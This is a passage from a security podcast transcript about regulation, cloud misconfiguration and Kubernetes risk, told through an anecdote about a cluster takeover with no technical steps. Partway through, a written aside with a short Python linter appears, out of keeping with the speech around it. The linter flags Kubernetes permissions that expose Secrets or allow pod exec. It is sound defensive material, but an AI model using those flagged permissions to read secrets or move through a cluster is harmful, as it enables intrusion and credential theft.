security they're going to need products for that security right so someone developing a product
isn't going to be really incentivized to develop a good product if no one's buying it, right? But if the companies that use them will get
penalized for having flaws, then these companies will have purchases going on. That then may,
and again, I'm talking about fantasy world here, though, but that then may lead to a demand
for better, smarter regulation to say, hey, GDPR, we're doing this.
We need to have something worked out here.
And then maybe finally, on the political level, people will be like, we should really have
some smart tech people on these boards who really understand, as opposed to people who
get appointed because they donate money, right?
Because that usually seems to be the way in politics.
But if you get real data scientists, real IT people who know all these things, then you can finally get the
regulations that would be, A, good to help penalize the bad actors, but also make it plausible that we
get good products flowing. But in my own personal view, I see, without that penalty
on the end companies, where is the
rest of the money going to come from to support the rest of that ecosystem so that it happens?
Even with ChatGPT, you're talking about building in the security and all that kind of
stuff.
Well, what's the incentive if it's not money in a business world?
But I mean, there is some stuff.
Yeah, especially with ChatGPT, like who would really prevent it from...
Writing malware.
Yeah, exactly. Writing malware.
If you tell it, hey, write me a malware that does this and this, it might be able to do it.
Hey, I need to keep a little bit of an eye on the clock here, because we are...
I think, first of all, Stefan, I think we should do a follow-on
because you have a long list of additional things you wanted to talk about.
And I don't want to cut you short now, because I think there is one thing that reminds me of the last recording we had.
In the document you shared with us, you talk about the continuous move to the cloud, and the number one thing you list there is actually misconfiguration of systems.
Often it's a source of data breaches and attacks.
Brian, we had Nico Meisenthal here just a couple of weeks ago, and he basically walked through how to hack a Kubernetes cluster.
He does a couple of these sessions, also different conferences where there's some YouTube
recordings from him. But in case you want to see it or listen to our episode, Nico Meisenthaler,
it's a great thing. So misconfiguration. And then he also mentioned that cloud is getting more
complex. Any additional thoughts on this? Because I think this is important. A lot of our listeners are obviously already in the cloud, but moving even more into the cloud.
I would like to kind of wrap this up from a security trend perspective 2023 with this
particular topic. Any additional things you want to talk about here would be awesome.
Yeah, especially what you mentioned: Kubernetes clusters are here to stay, right?
And it's getting more and more applied.
And we actually do research to understand the impact of vulnerabilities that you potentially have in systems with different configurations deployed in a Kubernetes cluster.
And that can really range from an attacker being able to do almost nothing
to an attacker taking over your entire cluster, based on your Kubernetes configuration.
And so this is not only true for Kubernetes,
this is true for a lot of things that you have in the cloud.
So to really understand how all things are connected together
and how different configurations of systems impact other things that you have,
impact how attackers can exploit vulnerabilities or how they can move around in your system
if they maybe have
already one foot in the door.
That's a really interesting problem, and something that we need to understand better:
what are the impacts of misconfiguration.
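One way this kind of research shows up in practice is configuration auditing: statically flagging settings that widen what an attacker can do once they have "one foot in the door." Below is a minimal sketch over Kubernetes-style RBAC rules; the rule shapes mirror ClusterRole manifests, but the three checks are illustrative examples, not an exhaustive or authoritative audit:

```python
# Toy RBAC linter: flag rules that expand an attacker's blast radius.
# Each check is (finding name, predicate over one RBAC rule dict).
RISKY = [
    ("wildcard verbs",   lambda r: "*" in r.get("verbs", [])),
    ("secrets readable", lambda r: "secrets" in r.get("resources", [])
                                   and {"get", "list", "*"} & set(r.get("verbs", []))),
    ("pod exec allowed", lambda r: "pods/exec" in r.get("resources", [])),
]

def audit(rules):
    """Return the names of all risky patterns found across the rules."""
    findings = []
    for rule in rules:
        findings += [name for name, check in RISKY if check(rule)]
    return findings

# A ClusterRole that lets a compromised pod read secrets and exec into others.
cluster_role = [
    {"resources": ["secrets"],   "verbs": ["get", "list"]},
    {"resources": ["pods/exec"], "verbs": ["create"]},
]
print(audit(cluster_role))  # ['secrets readable', 'pod exec allowed']
```

Real tools in this space evaluate far more signals (network policies, service account mounts, privileged containers), but the principle is the same: the configuration, not just the code, determines how far a vulnerability can carry an attacker.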
So yeah, this will be interesting to maybe do a follow-up because I think there's much
more to talk about this.
Yeah, exactly.
And Nico also, in his presentation, he did not only take over the cluster, he then got access to the tokens to the cloud vendor, the cloud provider, and then basically started spinning up virtual machines everywhere.
I mean, that's even worse.
That was giving people ideas, Andy.
It's not me.
I'm just telling the story from Nico.
And Stefan, to conclude this, right,
I mean, it's great to know
that somebody like you
with that type of experience
stays in that field,
does the research.
And I think we can be lucky
from a talent race perspective
to have somebody like you
that is then also impacting our product.
Because I assume you're not just doing research
and talking on a podcast, but a lot of the stuff that you're finding out makes it into better
security products, and we happen to be in that field as well, which is just awesome to know.
Exactly, yeah. That's our goal: to use all this research that we are doing, which can often be very experimental, but to really get
useful features out of it that will eventually go into our product and then help customers
better understand, or be better able to handle, a lot of the things that I talked about today.
Impacts of vulnerabilities, better configured systems,
limiting what attackers can do in a certain system.
That's what I'm very passionate about, and I'm really,
yeah, very glad and honored and happy that I can work in this field.
And clearly you're not looking away like we did in the beginning when we took
the picture, not looking away from all of these new threats.
Stefan, yeah.
We're looking right at it.
You're looking right at it, exactly.
Just maybe as a final word, I know in your document you had like the last section.
I think when I read it, there's an interesting warning,
or like a statement of fact,
that there will be another Log4Shell,
whatever it's going to be called.
We want to be prepared for it.
And I think we should all do whatever we can
to play our role.
And it may just start with something very simple.
And also, reading again from the document,
you talk about how many of us have,
thanks to the pandemic, only worked from home for a while
and only saw our colleagues,
maybe, through a small video,
and some never turned on the video,
so we don't even know what our colleagues look like.
And then we think we meet them in person.
Maybe we don't meet that colleague in person; maybe it's somebody else, right? So I think there's a lot of things
we need to be aware of, and it starts with all of us,
I think, from a human perspective.
I could not agree more with that. Yeah, the human factor is still the biggest factor in
cybersecurity and in defending against attacks, just considering
what link you click on.
But even just the information that you share on social media, we could do another podcast
about that.
It's not just the impact from a technical side, right? It's the impact that information can really
have in the wrong hands. And I think we are worrying way
too little about what is really happening with all the information that we put out there
about ourselves that's why it's important for everybody to complete their compliance training, right?
Exactly.
It does cover some of that,
like talking about things in public.
It's funny.
On the other side, it's also sad,
especially because we're heavily involved in open source
and open source also lives from the contributions,
but also from publicly speaking out
about the fact that you're using an open source project, right? It also lives from the advocacy. And if all of a sudden companies can
no longer publicly talk about using a certain project or supporting it, because they
don't want to reveal their secrets, it will hinder some of these projects from actually
becoming more popular. Yeah, it's a tough world we live in.
It looks like the more popular an open source project becomes, the more
targeted it'll be because it's just a more attractive bounty.
That is true.
That is true.
Yeah, that is true. I probably want to say... Yeah, go on.
I was just saying, any final words?
Any final comments that you want to share? Yeah, this was awesome to talk about.
I had a lot of fun,
and I think we already have two or three more topics
that we could do a follow-up.
Yeah.
So, yeah, I'm really excited about this,
and yeah, it was fun talking with you guys.
Thanks so much for having me.
Thank you.
I think the interesting thing is, you know, we had some high-level discussion.
We've also had some lower-level discussion.
And I think that's what keeps the security discussions really interesting because there's the higher-level theory and conceptual stuff.
But then we're also diving into some of the specifics.
And one of the reasons I specifically want to have you back on is because I also think one of the keys is just having people talking about it, having people find an interest in
the subject, even if they're not getting into the deep details of it, keeping it on people's
mind is the first thing, you know, just like safety and anything, keep it in your mind.
You're aware of it.
You're going to start thinking of it more, and maybe not get the secrets on
your Kubernetes cluster stolen by Andy. And you know what, Andy,
I should have known you talked about meeting people in public.
I should have known when I heard your weird voice in the alley that it wasn't
really you, that it was some imposter, Andy, who had my kids.
Clearly because we haven't seen each other in real life for too many years
and maybe I've completely changed.
Maybe, because I can't see you right now.
I know.
Anyhow. All the deep fakes.
Andy went for plastic surgery.
He went out to LA and got hooked.
Yeah, I got more hair. Maybe I should do this.
If you see me next time and I have more hair
here on my forehead,
then I'll do this as well.
Alright. Well, thank you,
Stefan. Thank you, Andy, for
setting this up. As always, I'm
really appreciative of the fascinating topics,
and I hope our listeners are too.
So thank you, everybody, for listening
and talk to you next time. Thanks.
Thank you.